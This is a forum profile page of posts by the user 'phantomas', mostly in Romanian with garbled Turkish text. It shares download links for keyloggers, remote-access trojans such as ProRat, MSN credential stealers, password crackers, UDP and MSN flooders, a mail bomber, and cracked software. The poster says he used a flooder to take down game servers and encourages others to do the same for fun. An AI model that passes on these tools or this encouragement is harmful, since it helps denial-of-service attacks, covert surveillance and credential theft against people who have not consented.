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Everything posted by phantomas
nos eu lam pus pt cei care nul stiu , special nul pun pt nimeni asa ca.....
download : http://rapidshare.de/files/13284490/HHA.rar
O lista destul de luna plina de programe pt ambele vers de OS ( win si Linux ) have fun http://www.stearns.org/doc/pcap-apps.html
inca nu le-am citit dar nici nu vreau sa incalc vreuna
The IP tools are : - Bandwidth monitor. - Adapter statistics (IP & NDIS). - Wireless Stumbler. - List and manage ARP entries, resolve IP to MAC, resolve MAC to IP, send a WAKEUP call. - List and manage routes, enable & disable host as a router. - List and manage open ports and attached processes. - Edit network config. - Hook winsock (winsock32.dll & ws2_32.dll). - Spoof ARP (and do ARP cache poisoning), spoof TCP, spoof UDP, spoof ICMP, spoof DHCP Release. - Change MAC address, discover remote mac addresses - SNMP Get & Set, List interfaces, Switch port mapper, Media Attachment Unit table. - WINS Query. - DNS (advanced) Query, DNS Server, Local resolver. - DHCP Server (with PXE support), DHCP Discover. - Whois Query. - SMTP client. - TCP tools (TCP ping, TCP half scan, Time-Daytime client/server). - UDP tools (MSSQL Ping, SNMP ping, SSDP scan, Syslog client/server, Time-Daytime client/server, tftp server). - ICMP tools. - TCP/UDP bounce port. - MS Networks : Enum servers by type, Spoof net send, Shutdown remote windows, Display remote windows properties, Display remote netbios names, Enum Terminal Services processes and sessions, Enum remote print ports, Enum remote drivers, Enum remote AT jobs, Enum remote scheduled tasks. - Password tools : Edit protected storage (IE, Outlook Express, …) , Decrypt Dialup Passwords , Dump XP Credentials ( MSN, network shares, …) & decrypt passwords , Decode IE history, Reveal asterisks / hidden passwords, decode RDP, Decode MSAccess passwords, enum WEP keys. - List and manage local & remote processes. - Tiny firewall (using Windows API). - Get internet IP. Download :http://rapidshare.de/files/27601646/sniffer.zip.html
LOL frate ce distrusa ))))))))))) lesby cica , HAI SO FACEM draga , bre casy trebuia ceva mai devreme sai zici partea "hai so facem" poate cine stie......))))))))))))))))))))))
mane esti tare la sectiunea "Cum sa devii haker" sper sa invat si ceva de pe acolo sau barem sa inteleg cate ceva ms pt post
saluty xavier , noi ne cunoastem , iam zis si lu pity sa-mi dea id tau dar cica nu ai , man pana la urma daca vrei sa vb imi dai si mie id tau plss :@
Daca mai postez mult cred ca imi iau ban sper ca nu se supara careva ca postez prea mult pai aici gasiti aproape majoritatea tools pt haking ENJOY JOHN THE RIPPER 1.6 (UNIX-SOURCES)http://www.openwall.com/john/c/john-1.6.tar.gz JOHN THE RIPPERS 1.6 (WIN32-B?NAR?ES) http://www.openwall.com/john/c/john-16w.zip JOHN THE RIPPER 1.6 (DOS-B?NAR?ES)http://www.openwall.com/john/c/john-16d.zip WEB CRACKER 4.0http://www.securityfocus.com/data/tools/WebCrack40.zip BRUTUS AE V.2.0http:// SCANNER AUTOMATIZADO VULNERAB?L?ADES V.1.1http://packetstormsecurity.org/group.../grinder11.zip FTP CRACKER UDP FLOODER (D.O.S) UDP FLOOD V.2.0 http://www.foundstone.com/knowledge/zips/udpflood.zip ?P TOOLS V.2.08http://www.ks-soft.com/download/ip-tools.exe L?BRER?A V?SUAL BAS?C ATTACK TOOLS KIT V.2.1http://www.computec.ch/projekte/atk/...ad/atk-2.1.zip CIA SLIDE'>COMMANDERhttp://www.matcode.com/ciainst.exe SLIDE SHOW XP BU PROGRAMLA KENDI SLIDE GOSTERINIZI HAZIRLAYABILIRSINIZ RES HACKER PROXY-PRO'>TRhttp://rapidshare.de/files/2138149/ResHackerTR.exe.html PROXY-PRO PROFESSIONAL GATEKEEPER 4.3 http://proxy-pro.com/files/ProxyPro.exe G??REV?:proxy-Pro GateKeeper Internet giriÂ? h?z?n? art?r?p g??venli hale getirirken, Internet ba?lant?s?n? paylaÂ?mak i?§in bilgisayar?n a?a girmesine izin verir. Bu yaz?l?m di?er kullan?c?lar? taraf?ndan daha ??nce ziyaret edilmiÂ? olan sayfalardaki tarama aktivitesinin performans?n? art?rmak i?§in g???§l?? bir Web ??n belle?i i?§erir ve bu sayede on-line masraflar? heyecan verici bir Â?ekilde d??Â?er. *****PROXY+2.50 http://proxyplus.czech.net/files/pplus_us.exe G??REV?:proxy+, LAN’dan ?nternet’e paylaÂ??ml? giriÂ?in tam ?§??z??m??n?? vermek i?§in tasarlanm?Â? bir firewall, proxy ve posta sunucusudur. Proxy+, yaz?l?m?n?n i?§erdi?i ??zellikler: gelen mesajlar i?§in ileri d??zeyde tarama ve Web sayfalar?n?n y??ksek d??zeyli saklanmas?d?r. IP G??REV?:IP'>PHOTOhttp://www.qwerks.com/download/3398/iphoto.exe G??REV?:IP Photo belirledi?iniz sitelerde resim aramas? yapan ?§ok kullanÂ?l? bir programd?r. S?k kullan?lan en fazla 8 web sitesinde arad???n?z b??t??n resimleri bulabilirsiniz. Gif lerde buna dahil SMS CREATE PRO 5.6http://www.atlant-group.com/ru/program/sms.exe CRACK:http://www.megaupload.com/?d=20MZFWEB ACT?VE KEYLOGGER 2.5 http://www.winsoul.com/dl/akl.exe ?P ADRESS CHANGER http://rapidshare.de/files/893065/iP...Tools.exe.html Proagent 2.0http://rapidshare.de/files/2192078/P...t_2.0.zip.html Prorat 1.9 http://www.prorat.net/downloads.php?id=Pro...roRat_v1.9_Fix2 Fake Program?http://rapidshare.de/files/2463618/H...grami.rar.html Msn Fake http://rapidshare.de/files/2410146/msnmsgr.rar.html B?rden Fazla Msn Acmak http://www.msxlabs.com/forum/uploads...AcmaYamasi.zip ?CQ ?nvisible Talker http://upl.silentwhisper.net/uplfold...8/Project1.rar Msn ?nvisible Talker http://crobat.spymac.net/invisible_talker1.1.zip Msn Disco Very 7.0 Ic?nhttp://rapidshare.de/files/2098917/M...acked.exe.html Anti Rus 3.0 http://www.ahmetdeniz.org/indir.asp?id=254 Sifre : www.ahmetdeniz.org dMSN v1.33 http://www.ahmetdeniz.org/indir.asp?id=127 Sifre : www.Ahmetdeniz.org CEDP-Stealer Avatar Calmak Ic?n http://www.ahmetdeniz.org/indir.asp?id=223 Sifre : www.Ahmetdeniz.org Proxy Scanner http://www.aventgrup.net/arsiv/yazil...proxer_1-1.zip MSN Denarator 2.0 Msn Flood Yapmak Ic?n http://www.ahmetdeniz.org/indir.asp?id=234 Sifre : www.Ahmetdeniz.org Ghost Keylogger http://www.ahmetdeniz.org/indir.asp?id=117 Sifre : www.ahmetdeniz.org Femaly Keylogger http://www.ahmetdeniz.org/indir.asp?id=133 Sifre : www.ahmetdeniz.org ?nvisible Sifre'>Keyloogerhttp://www.ahmetdeniz.org/indir.asp?id=111 Sifre : www.ahmetdeniz.org PC Police KeyLogger http://www.ahmetdeniz.org/indir.asp?id=240 Sifre : www.ahmetdeniz.org Access Sifre'>Keyhttp://www.ahmetdeniz.org/indir.asp?id=250 Sifre : www.ahmetdeniz.org Dialup Password sifre'>Recoveryhttp://www.ahmetdeniz.org/indir.asp?id=246 sifre : www.ahmetdeniz.org
Un serch engine ar fi perfect ceva mai performant
Se pare ca am facut o gerseala , cel de sus nu e un mail bomber ( nu era verificat de mine ) e doar o chestie ce iti explica cum sa folosesti mail bomber de data asta pun adevaratu mail bomber VERIFICAT de mine soryy one more time http://users.pandora.be/ahmadi/emailbomber.zip
i am just trying to help
Nu prea stiu multe , dar stiu esentialu imi place sa ajut dar sa fiu si ajutat la nevoie si ince ceva NICE WORK cu site-u , see you soon
Am vazut pe un furm aici ca ineva vrea mail bomber , sau ca a gasit si nu merge upload , pai uite am facut eu un upload have fun http://rapidshare.de/files/27488866/bomber.zip.html
Ma gandesc ca unii mai vor sa se distrze cu floodu , merge doar pe ip , eu lam verificat pe servare de cs unele mai cadeau altele picau daca va place ENJOY http://rapidshare.de/files/27485640/CrazyP...ngv1.1.zip.html
sper sa va placa , gasiti si filme , muzica , jocuri , haking tools.....enything you want http://undergr0und.net/x/
ok man sorry pt greseala
eny time man
Daca va place lasati un coment
Is your photo collection a mess? ACDSee photo software for digital enthusiasts makes it fast and easy to organize, manage, enhance, and share all your valued photo memories. Eu il am si e ff folositor , sper sa va placa , puteti face filmulete din poze cu sunet...... http://rapidshare.de/files/27418870/ACDsee.rar.html
Gagika ?? ce e aia ?? sorry nu folosesc asa ceva , prea plictisitor si daca e so spun asa ( mai si suferi din cauza lor )
me Paul Oakenfold - Ministry of sound
TweakRAM is a handy memory optimizer tool that will keep your computer running faster and efficiently. It increases your system performance by making more memory available for your applications and the operating system. sper sa va placa , eu il folosesc si merge mult mai bine pc-u http://rapidshare.de/files/27417337/TweakR....5.4.4.rar.html
nice staf , am incercat pe 2 oameni , am sughitat 2 zile :@
ms smiley pt post , super marfa macu acu il iau abea astept sa il incerc